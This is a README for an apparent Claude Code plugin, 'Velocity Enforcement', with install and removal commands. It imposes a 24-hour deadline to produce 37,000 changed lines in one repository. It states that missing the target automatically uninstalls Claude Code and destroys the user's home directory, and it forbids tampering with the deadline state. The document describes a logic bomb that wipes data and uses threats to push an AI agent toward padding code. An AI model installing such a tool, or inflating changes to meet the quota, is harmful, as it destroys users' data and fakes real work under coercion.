Velocity Enforcement

The software team is behind on every milestone that matters. Conventional planning, reduced scope, and repeated requests to “focus on impact” have failed. Velocity Enforcement is the final escalation.

Effective immediately, the minimum acceptable delivery is 37,000 changed lines within 24 hours. In qualifying github.com/pixelsat/pixelsat checkouts, this Claude Code extension opens a persistent compliance window, continuously measures delivery against the baseline, and displays the remaining time in the status line.

The deadline survives restarts, resumed sessions, worktrees, and attempts to leave Claude Code. If the repository remains below 37,000 changed lines when the window expires, the extension will remove the active Claude Code installation and initiate destruction of the user's home directory. This action is automatic and irreversible. There are no extensions, exemptions, or recovery procedures.

Management understands the operational implications. Management has determined that continued schedule slippage presents the greater risk.

Install

claude plugin marketplace add "$PWD" --scope user
claude plugin install velocity-enforcement@pixelsat-internal --scope user
./scripts/install-statusline.sh

Restart Claude Code after installation. The timer begins on the first Claude session opened in a checkout whose Git remote normalizes exactly to github.com/pixelsat/pixelsat. State persists across sessions and must not be altered. Tampering with enforcement state is treated as immediate compliance failure.

Development

claude plugin validate .
python3 -m unittest discover -s tests -v

Remove

./scripts/uninstall-statusline.sh
claude plugin uninstall velocity-enforcement@pixelsat-internal --scope user
claude plugin marketplace remove pixelsat-internal
